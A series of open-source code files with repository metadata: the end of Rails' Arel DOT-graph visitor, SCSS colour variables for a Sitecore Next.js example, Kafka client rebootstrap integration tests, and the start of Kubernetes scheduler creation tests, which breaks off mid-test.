def visit_Arel_Nodes_Casted(o)
visit_edge o, "value"
visit_edge o, "attribute"
end
def visit_Arel_Nodes_HomogeneousIn(o)
visit_edge o, "values"
visit_edge o, "type"
visit_edge o, "attribute"
end
def visit_Arel_Attributes_Attribute(o)
visit_edge o, "relation"
visit_edge o, "name"
end
def visit__children(o)
o.children.each_with_index do |child, i|
edge(i) { visit child }
end
end
alias :visit_Arel_Nodes_And :visit__children
alias :visit_Arel_Nodes_Or :visit__children
alias :visit_Arel_Nodes_With :visit__children
def visit_String(o)
@node_stack.last.fields << o
end
alias :visit_Time :visit_String
alias :visit_Date :visit_String
alias :visit_DateTime :visit_String
alias :visit_NilClass :visit_String
alias :visit_TrueClass :visit_String
alias :visit_FalseClass :visit_String
alias :visit_Integer :visit_String
alias :visit_BigDecimal :visit_String
alias :visit_Float :visit_String
alias :visit_Symbol :visit_String
alias :visit_Arel_Nodes_SqlLiteral :visit_String
def visit_Arel_Nodes_BindParam(o)
visit_edge(o, "value")
end
def visit_ActiveModel_Attribute(o)
visit_edge(o, "value_before_type_cast")
end
def visit_Hash(o)
o.each_with_index do |pair, i|
edge("pair_#{i}") { visit pair }
end
end
def visit_Array(o)
o.each_with_index do |member, i|
edge(i) { visit member }
end
end
alias :visit_Set :visit_Array
def visit_Arel_Nodes_Comment(o)
visit_edge(o, "values")
end
def visit_Arel_Nodes_Case(o)
visit_edge(o, "case")
visit_edge(o, "conditions")
visit_edge(o, "default")
end
def visit_edge(o, method)
edge(method) { visit o.send(method) }
end
def visit(o)
if node = @seen[o.object_id]
@edge_stack.last.to = node
return
end
node = Node.new(o.class.name, o.object_id)
@seen[node.id] = node
@nodes << node
with_node node do
super
end
end
def edge(name)
edge = Edge.new(name, @node_stack.last)
@edge_stack.push edge
@edges << edge
yield
@edge_stack.pop
end
def with_node(node)
if edge = @edge_stack.last
edge.to = node
end
@node_stack.push node
yield
@node_stack.pop
end
def quote(string)
string.to_s.gsub('"', '\"')
end
def to_dot
"digraph \"Arel\" {\nnode [width=0.375,height=0.25,shape=record];\n" +
@nodes.map { |node|
label = "<f0>#{node.name}"
node.fields.each_with_index do |field, i|
label += "|<f#{i + 1}>#{quote field}"
end
"#{node.id} [label=\"#{label}\"];"
}.join("\n") + "\n" + @edges.map { |edge|
"#{edge.from.id} -> #{edge.to.id} [label=\"#{edge.name}\"];"
}.join("\n") + "\n}"
end
end
end
end | ruby | github | https://github.com/rails/rails | activerecord/lib/arel/visitors/dot.rb |
//Backgrounds colors
$bg-transparent: transparent !default;
$bg-basic-color: #ffffff !default;
$bg-basic-color-active: #cccccc !default;
$bg-light-gray: #f7f7f7 !default;
$bg-light-gray-active: #dadada !default;
$bg-blue: #89c6cc;
$bg-blue-active: #15909c !default;
$bg-submenu: #edebeb !default;
$bg-submenu-active: #f6f6f6 !default;
$bg-black: #000;
$bg-black-active: #3d3d3d;
$bg-dark-gray: #262626;
//Text colors
$text-white: #fff !default;
$text-heading-color: #222 !default;
$text-basic: #747474 !default;
$text-basic-active: #878787 !default;
$text-blue: #89c6cc !default;
$text-blue-active: #15909c !default;
$text-submenu-active: #222 !default;
$text-disabled: #aaa !default;
$text-black: #000 !default;
$text-red: #de232f;
$text-gray: #262626;
//Border colors
$border-gray: #d2d2d2 !default;
$border-white: #ffffff !default;
$border-basic-color: #89c6cc !default;
$border-basic-active: #15909c !default;
$border-nav-submenu: #e1e1e1;
//Styles for each component separately
//Accordion
$accordion-header-bg: transparent;
$accordion-header-bg-active: transparent;
$accordion-toggled-bg: transparent;
$accordion-header-border: $border-gray;
//Breadcrumb
$breadcrumb-dropdown-bg: $bg-basic-color;
$breadcrumb-dropdown-bg-active: $bg-blue;
$breadcrumb-dropdown-text-active: $text-white;
$breadcrumb-bg: transparent;
$breadcrumb-color: $text-basic;
$breadcrumb-color-active: $text-blue-active;
//Buttons colors
$btn-green-light: #a0ce4e;
$btn-green: #92be43;
$btn-red-active: #c34e30;
$btn-red: #bc4526;
//Carousel
$carousel-bg: $bg-basic-color;
$carousel-nav: $text-black;
$carousel-nav-active: $text-basic-active;
$carousel-nav-border: $border-basic-color;
//Container component
$container-title-row-bg: $bg-light-gray;
//Event List
$event-list-bg: transparent;
$event-list-item-bg: $bg-basic-color;
$event-list-item-color: $text-basic;
$event-list-title-border: $border-basic-color;
//Calendar
$calendar-bg: $bg-basic-color;
$calendar-header-bg: $bg-basic-color-active;
$calendar-day-color-active: $text-white;
$calendar-title-color: $text-white;
//Feed
$feed-bg: transparent;
$feed-item-bg: transparent;
//Field Editor
$field-editor-bg: transparent;
$field-editor-table-border: $bg-light-gray;
$field-editor-text-header: $text-black;
$field-editor-text-header-active: $text-red;
$field-editor-text: $text-basic;
//File List
$file-list-bg: transparent;
$file-list-item-bg: transparent;
$file-list-title-color: $text-basic;
$file-list-title-border: transparent;
$file-list-item-color: $text-basic;
$file-list-item-color-active: $text-basic-active;
$file-list-item-size: $text-basic;
$file-list-item-borer: $border-basic-color;
$file-list-link-btn-color-active: $text-white;
$file-list-link-btn-color: $text-basic;
$file-list-link-btn-bg: $bg-blue-active;
$file-list-link-btn-bg-active: $bg-blue;
//Flip
$flip-bg: transparent;
$flip-slides-bg: $bg-basic-color;
$flip-slides0-bg: #f6f6f6;
$flip-slides1-bg: $bg-blue-active;
$flip-slides1-color: $text-white;
$flip-border: $border-gray;
//Gallery
$galleria-container-bg: transparent;
$gallery-info-bg: $bg-basic-color;
$gallery-info-border: $border-gray;
$gallery-info-text: $text-basic;
$gallery-nav-active: $text-white;
$gallery-nav: $text-basic;
$gallery-counter-color: $text-white;
//Language selector
$lang-selector-bg: $bg-basic-color;
$lang-selector-border: $border-basic-color;
$lang-selector-item-bg-active: $bg-basic-color;
$lang-selector-item-border: $border-white;
$lang-selector-item-border-active: $border-basic-active;
//Site selector
$site-selector-color: $text-basic;
//Link List
$link-list-bg: transparent;
$link-list-header-border: $border-basic-color;
$link-list-items-bg: transparent;
$link-list-item-bg: transparent;
$link-list-item-color: $text-basic;
$link-list-item-color-active: $text-basic-active;
$link-list-item-border-active: $border-basic-color;
//Login
$login-bg: transparent;
//Logout
$logout-bg: transparent;
$logout-link-text-color: $text-basic;
$logout-link-text-color-active: $text-basic-active;
$logout-link-border: $border-basic-color;
//Map
$map-bg: transparent;
$map-border: none;
//Page List
$page-list-bg: $bg-transparent;
$page-list-item-bg: $bg-transparent;
$page-list-item-title-text: $text-black;
$page-list-item-border: $border-basic-color;
//Pagination
$list-pagination-bg: transparent;
$list-pagination-active-bg: $bg-blue;
$list-pagination-active-color: $text-white;
$list-pagination-active-color: $text-blue;
$list-pagination-active-bg: $bg-submenu-active;
$list-pagination-active-border: $border-basic-active;
//Play list
$play-list-bg: transparent;
$play-list-item-bg: transparent;
$play-list-item-color: $text-basic;
$play-list-item-color-active: $text-white;
$play-list-nav-active: $text-blue;
$play-list-item-bg: $bg-light-gray;
$play-list-item-active-bg: $bg-blue;
$play-list-border: $border-basic-color;
$play-list-title-border: $border-basic-color;
//Promo
$promo-bg: $bg-basic-color;
$promo-bg-hero: rgba(0, 0, 0, 0.5);
$promo-border: $border-gray;
$promo-hero-text-color: $text-white;
$promo-shadow-border: $border-basic-color;
//Rich Text Content
$rich-content-bg: transparent;
$rich-content-color: $text-basic;
$rich-content-border: transparent;
$rich-content-link-color: $text-red;
$rich-content-link-color-active: $text-basic-active;
//Search
$search-filter: $text-basic;
$search-filter-border: $border-basic-color;
//Menu colors
$menu-hover-color: #1b809e;
$menu-active-color: #176f89;
//Navigation
$nav-bg: transparent;
$nav-color-root: $text-basic;
$nav-color-root-active: $text-basic;
$nav-border-root: $border-basic-color;
$nav-border-root-active: $border-basic-color;
$nav-color-submenu: $text-submenu-active;
$nav-color-submenu-active: $text-submenu-active;
$nav-bg-root: $bg-submenu-active;
$nav-bg-submenu: $bg-submenu-active;
$nav-bg-submenu-active: $bg-submenu-active;
$nav-border-submenu: $border-basic-color;
$nav-submenu-item-border: $border-gray;
$nav-submenu-border-active: $border-basic-color;
//Social Media Share
$social-media-share-bg: transparent;
//Tabs
$tab-heading-bg: $bg-light-gray;
$tab-heading-active-bg: $bg-basic-color;
$tab-heading-color: $text-heading-color;
$tab-heading-active-color: $text-black;
$tab-container-bg: transparent;
$tab-container-border: $border-basic-color;
//Title
$title-bg: transparent;
$title-color: $text-basic;
$title-color-active: $text-basic-active;
//Toggle
$toggle-header-bg: $bg-basic-color;
$toggle-content-bg: $bg-basic-color;
$toggle-show-color: $text-basic-active;
//Search Components
$search-btn-bg: transparent;
$search-btn-active-bg: #e0e0e0;
$search-btn-active-border: #adadad;
//Image component
$image-caption-color: $text-basic;
//Media Link Component
$media-link-bg: transparent;
$media-link-border: $border-basic-color;
$media-link-color: $text-basic;
$media-link-color-active: $text-basic-active;
//Tag Component
$tag-color: $text-basic;
$tag-color-active: $text-basic-active;
$tag-border-active: $border-basic-active;
$tag-link-bg: $bg-blue;
$tag-link-bg-active: $bg-blue-active;
$tag-link-color: $text-white;
//Link Component
$link-bg: transparent;
$link-text-color: $text-basic;
$link-text-color-active: $text-basic-active;
$link-border: $border-basic-color;
//Overlay
$overlay-bg: $bg-light-gray;
//Search Components
$search-title-border: $border-basic-color;
$search-title-color: $text-basic;
$search-item-color: $text-basic;
$search-item-color-active: $text-basic;
$search-item-border: $border-basic-color;
$search-item-border-active: $border-basic-active;
//
//Search Facet Summary
$search-facet-summary-border: transparent;
$search-facet-summary-background: transparent;
$search-facet-summary-item-color: $text-basic;
$search-facet-summary-item-color-horizontal: $text-basic;
$search-facet-summary-item-border: $border-gray;
$search-facet-summary-item-border-horizontal: $border-basic-color;
$search-facet-summary-item-shadow: $border-gray;
$search-facet-summary-clear-border-horizontal: $btn-red;
$search-facet-summary-clear-color: $text-red;
$search-facet-summary-clear-color-horizontal: $text-blue;
//
$search-filter-radius-active: $text-blue;
$search-filter-radius-border: $border-gray;
$search-filter-radius-bg: $border-gray;
//
$search-filter-slider-border-active: $border-basic-color;
$search-filter-slider-bg-active: $bg-blue;
$search-filter-slider-btn-border: $border-gray;
$search-filter-slider-btn-bg: $bg-light-gray;
$search-filter-slider-btn-bg-active: $bg-light-gray-active;
//Search Pagination
$search-pagination-bg: transparent;
$search-pagination-active-bg: $bg-blue;
$search-pagination-active-color: $text-white;
$search-pagination-hover-color: $text-blue;
$search-pagination-hover-bg: $bg-submenu-active;
$search-pagination-hover-border: $border-basic-active;
//Search selector
$search-selector-variant-color-active: $text-blue-active;
//Typehead
$tt-color: $text-basic;
$tt-color-active: $text-blue;
$tt-price-color: $text-blue;
$tt-dropdown-bg: $bg-light-gray;
$tt-suggestion-bg-active: $bg-light-gray-active;
$tt-dropdown-border: $border-gray;
//Video
$video-control-bg: $bg-basic-color;
$video-time-color: $text-basic;
$video-time-total-bg: $bg-black;
$video-time-handle-border: $border-gray;
$video-time-handle-bg: $bg-black;
//Form component
$form-bg: transparent;
$form-border: transparent;
$form-color: $text-basic;
//Main
$page-bg: $bg-basic-color;
$page-bg-editor: none; | unknown | github | https://github.com/vercel/next.js | examples/cms-sitecore-xmcloud/src/assets/sass/abstracts/vars/_colors.scss |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.clients;
import org.apache.kafka.clients.admin.NewTopic;
import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.apache.kafka.clients.consumer.GroupProtocol;
import org.apache.kafka.clients.producer.ProducerConfig;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.apache.kafka.common.TopicPartition;
import org.apache.kafka.common.config.TopicConfig;
import org.apache.kafka.common.test.ClusterInstance;
import org.apache.kafka.common.test.api.ClusterConfigProperty;
import org.apache.kafka.common.test.api.ClusterTest;
import org.apache.kafka.common.test.api.Type;
import org.apache.kafka.coordinator.group.GroupCoordinatorConfig;
import org.apache.kafka.test.TestUtils;
import java.time.Duration;
import java.util.List;
import java.util.Map;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import static org.junit.jupiter.api.Assertions.assertDoesNotThrow;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertThrows;
public class ClientRebootstrapTest {
private static final String TOPIC = "topic";
private static final int PARTITIONS = 1;
private static final int REPLICAS = 2;
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testAdminRebootstrap(ClusterInstance clusterInstance) {
var broker0 = 0;
var broker1 = 1;
var timeout = 60;
clusterInstance.shutdownBroker(broker0);
try (var admin = clusterInstance.admin()) {
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
// Only the broker 1 is available for the admin client during the bootstrap.
assertDoesNotThrow(() -> admin.listTopics().names().get(timeout, TimeUnit.SECONDS).contains(TOPIC));
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// The broker 1, originally cached during the bootstrap, is offline.
// However, the broker 0 from the bootstrap list is online.
// Should be able to list topics again.
assertDoesNotThrow(() -> admin.listTopics().names().get(timeout, TimeUnit.SECONDS).contains(TOPIC));
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testAdminRebootstrapDisabled(ClusterInstance clusterInstance) {
var broker0 = 0;
var broker1 = 1;
clusterInstance.shutdownBroker(broker0);
var admin = clusterInstance.admin(Map.of(CommonClientConfigs.METADATA_RECOVERY_STRATEGY_CONFIG, "none"));
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
// Only the broker 1 is available for the admin client during the bootstrap.
assertDoesNotThrow(() -> admin.listTopics().names().get(60, TimeUnit.SECONDS).contains(TOPIC));
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// The broker 1, originally cached during the bootstrap, is offline.
// As a result, the admin client will throw a TimeoutException when trying to get list of the topics.
assertThrows(TimeoutException.class, () -> admin.listTopics().names().get(5, TimeUnit.SECONDS));
// Since the brokers cached during the bootstrap are offline, the admin client needs to wait the default timeout for other threads.
admin.close(Duration.ZERO);
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testProducerRebootstrap(ClusterInstance clusterInstance) throws ExecutionException, InterruptedException {
try (var admin = clusterInstance.admin()) {
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
}
var broker0 = 0;
var broker1 = 1;
// It's ok to shut the leader down, cause the reelection is small enough to the producer timeout.
clusterInstance.shutdownBroker(broker0);
try (var producer = clusterInstance.producer()) {
// Only the broker 1 is available for the producer during the bootstrap.
var recordMetadata0 = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata0.offset());
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// Current broker 1 is offline.
// However, the broker 0 from the bootstrap list is online.
// Should be able to produce records.
var recordMetadata1 = producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get();
assertEquals(0, recordMetadata1.offset());
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testProducerRebootstrapDisabled(ClusterInstance clusterInstance) throws ExecutionException, InterruptedException {
try (var admin = clusterInstance.admin()) {
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
}
var broker0 = 0;
var broker1 = 1;
// It's ok to shut the leader down, cause the reelection is small enough to the producer timeout.
clusterInstance.shutdownBroker(broker0);
var producer = clusterInstance.producer(Map.of(CommonClientConfigs.METADATA_RECOVERY_STRATEGY_CONFIG, "none"));
// Only the broker 1 is available for the producer during the bootstrap.
var recordMetadata0 = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata0.offset());
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// The broker 1, originally cached during the bootstrap, is offline.
// As a result, the producer will throw a TimeoutException when trying to send a message.
assertThrows(TimeoutException.class, () -> producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get(5, TimeUnit.SECONDS));
// Since the brokers cached during the bootstrap are offline, the producer needs to wait the default timeout for other threads.
producer.close(Duration.ZERO);
}
public void consumerRebootstrap(ClusterInstance clusterInstance, GroupProtocol groupProtocol) throws InterruptedException, ExecutionException {
clusterInstance.createTopic(TOPIC, PARTITIONS, (short) REPLICAS);
var broker0 = 0;
var broker1 = 1;
var partitions = List.of(new TopicPartition(TOPIC, 0));
try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
var recordMetadata = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata.offset());
}
clusterInstance.shutdownBroker(broker0);
try (var consumer = clusterInstance.consumer(Map.of(ConsumerConfig.GROUP_PROTOCOL_CONFIG, groupProtocol.name))) {
// Only the server 1 is available for the consumer during the bootstrap.
consumer.assign(partitions);
consumer.seekToBeginning(partitions);
TestUtils.waitForCondition(() -> consumer.poll(Duration.ofMillis(100)).count() == 1, 10 * 1000, "Failed to poll data.");
// Bring back the server 0 and shut down 1.
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
var recordMetadata = producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get();
assertEquals(1, recordMetadata.offset());
}
// The server 1 originally cached during the bootstrap, is offline.
// However, the server 0 from the bootstrap list is online.
TestUtils.waitForCondition(() -> consumer.poll(Duration.ofMillis(100)).count() == 1, 10 * 1000, "Failed to poll data.");
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2"),
})
public void testClassicConsumerRebootstrap(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
consumerRebootstrap(clusterInstance, GroupProtocol.CLASSIC);
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2"),
})
public void testConsumerRebootstrap(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
consumerRebootstrap(clusterInstance, GroupProtocol.CONSUMER);
}
public void consumerRebootstrapDisabled(ClusterInstance clusterInstance, GroupProtocol groupProtocol) throws InterruptedException, ExecutionException {
clusterInstance.createTopic(TOPIC, PARTITIONS, (short) REPLICAS);
var broker0 = 0;
var broker1 = 1;
var tp = new TopicPartition(TOPIC, 0);
try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
var recordMetadata = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata.offset());
}
clusterInstance.shutdownBroker(broker0);
try (var consumer = clusterInstance.consumer(Map.of(
CommonClientConfigs.METADATA_RECOVERY_STRATEGY_CONFIG, "none",
ConsumerConfig.GROUP_PROTOCOL_CONFIG, groupProtocol.name)
)) {
// Only the server 1 is available for the consumer during the bootstrap.
consumer.assign(List.of(tp));
consumer.seekToBeginning(List.of(tp));
TestUtils.waitForCondition(() -> consumer.poll(Duration.ofMillis(100)).count() == 1, 10 * 1000, "Failed to poll data.");
// Bring back the server 0 and shut down 1.
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
var recordMetadata = producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get();
assertEquals(1, recordMetadata.offset());
}
// The server 1 originally cached during the bootstrap, is offline.
// However, the server 0 from the bootstrap list is online.
assertEquals(0, consumer.poll(Duration.ofMillis(100)).count());
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testClassicConsumerRebootstrapDisabled(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
consumerRebootstrapDisabled(clusterInstance, GroupProtocol.CLASSIC);
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testConsumerRebootstrapDisabled(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
consumerRebootstrapDisabled(clusterInstance, GroupProtocol.CONSUMER);
}
} | java | github | https://github.com/apache/kafka | clients/clients-integration-tests/src/test/java/org/apache/kafka/clients/ClientRebootstrapTest.java |
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package scheduler
import (
"context"
"errors"
"fmt"
"slices"
"sort"
"strings"
"sync"
"testing"
"time"
"github.com/google/go-cmp/cmp"
"github.com/onsi/gomega"
v1 "k8s.io/api/core/v1"
eventsv1 "k8s.io/api/events/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apimachinery/pkg/util/version"
"k8s.io/apiserver/pkg/util/feature"
"k8s.io/client-go/informers"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/kubernetes/fake"
"k8s.io/client-go/kubernetes/scheme"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/events"
featuregatetesting "k8s.io/component-base/featuregate/testing"
"k8s.io/klog/v2"
"k8s.io/klog/v2/ktesting"
fwk "k8s.io/kube-scheduler/framework"
"k8s.io/kubernetes/pkg/features"
schedulerapi "k8s.io/kubernetes/pkg/scheduler/apis/config"
"k8s.io/kubernetes/pkg/scheduler/apis/config/testing/defaults"
apicache "k8s.io/kubernetes/pkg/scheduler/backend/api_cache"
apidispatcher "k8s.io/kubernetes/pkg/scheduler/backend/api_dispatcher"
internalcache "k8s.io/kubernetes/pkg/scheduler/backend/cache"
internalqueue "k8s.io/kubernetes/pkg/scheduler/backend/queue"
"k8s.io/kubernetes/pkg/scheduler/framework"
apicalls "k8s.io/kubernetes/pkg/scheduler/framework/api_calls"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins/defaultbinder"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins/names"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins/queuesort"
frameworkruntime "k8s.io/kubernetes/pkg/scheduler/framework/runtime"
"k8s.io/kubernetes/pkg/scheduler/metrics"
"k8s.io/kubernetes/pkg/scheduler/profile"
st "k8s.io/kubernetes/pkg/scheduler/testing"
tf "k8s.io/kubernetes/pkg/scheduler/testing/framework"
utiltesting "k8s.io/kubernetes/test/utils/ktesting"
testingclock "k8s.io/utils/clock/testing"
"k8s.io/utils/ptr"
)
func init() {
metrics.Register()
}
func TestSchedulerCreation(t *testing.T) {
invalidRegistry := map[string]frameworkruntime.PluginFactory{
defaultbinder.Name: defaultbinder.New,
}
validRegistry := map[string]frameworkruntime.PluginFactory{
"Foo": defaultbinder.New,
}
cases := []struct {
name string
opts []Option
wantErr string
wantProfiles []string
wantExtenders []string
}{
{
name: "valid out-of-tree registry",
opts: []Option{
WithFrameworkOutOfTreeRegistry(validRegistry),
WithProfiles(
schedulerapi.KubeSchedulerProfile{
SchedulerName: "default-scheduler",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
)},
wantProfiles: []string{"default-scheduler"},
},
{
name: "repeated plugin name in out-of-tree plugin",
opts: []Option{
WithFrameworkOutOfTreeRegistry(invalidRegistry),
WithProfiles(
schedulerapi.KubeSchedulerProfile{
SchedulerName: "default-scheduler",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
)},
wantProfiles: []string{"default-scheduler"},
wantErr: "a plugin named DefaultBinder already exists",
},
{
name: "multiple profiles",
opts: []Option{
WithProfiles(
schedulerapi.KubeSchedulerProfile{
SchedulerName: "foo",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
schedulerapi.KubeSchedulerProfile{
SchedulerName: "bar",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
)},
wantProfiles: []string{"bar", "foo"},
},
{
name: "Repeated profiles",
opts: []Option{
WithProfiles(
schedulerapi.KubeSchedulerProfile{
SchedulerName: "foo",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
schedulerapi.KubeSchedulerProfile{
SchedulerName: "bar",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
schedulerapi.KubeSchedulerProfile{
SchedulerName: "foo",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
)},
wantErr: "duplicate profile with scheduler name \"foo\"",
},
{
name: "With extenders",
opts: []Option{
WithProfiles(
schedulerapi.KubeSchedulerProfile{
SchedulerName: "default-scheduler",
Plugins: &schedulerapi.Plugins{
QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
Bind: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
},
},
),
WithExtenders(
schedulerapi.Extender{
URLPrefix: "http://extender.kube-system/",
},
),
},
wantProfiles: []string{"default-scheduler"},
wantExtenders: []string{"http://extender.kube-system/"},
},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
client := fake.NewClientset()
informerFactory := informers.NewSharedInformerFactory(client, 0)
eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: client.EventsV1()})
_, ctx := ktesting.NewTestContext(t)
ctx, cancel := context.WithCancel(ctx)
defer cancel()
s, err := New(
ctx,
client,
informerFactory,
nil,
profile.NewRecorderFactory(eventBroadcaster),
tc.opts...,
)
// Errors
if len(tc.wantErr) != 0 {
if err == nil || !strings.Contains(err.Error(), tc.wantErr) {
t.Errorf("got error %q, want %q", err, tc.wantErr)
}
return
}
if err != nil {
t.Fatalf("Failed to create scheduler: %v", err)
}
// Profiles
profiles := make([]string, 0, len(s.Profiles))
for name := range s.Profiles {
profiles = append(profiles, name)
}
sort.Strings(profiles)
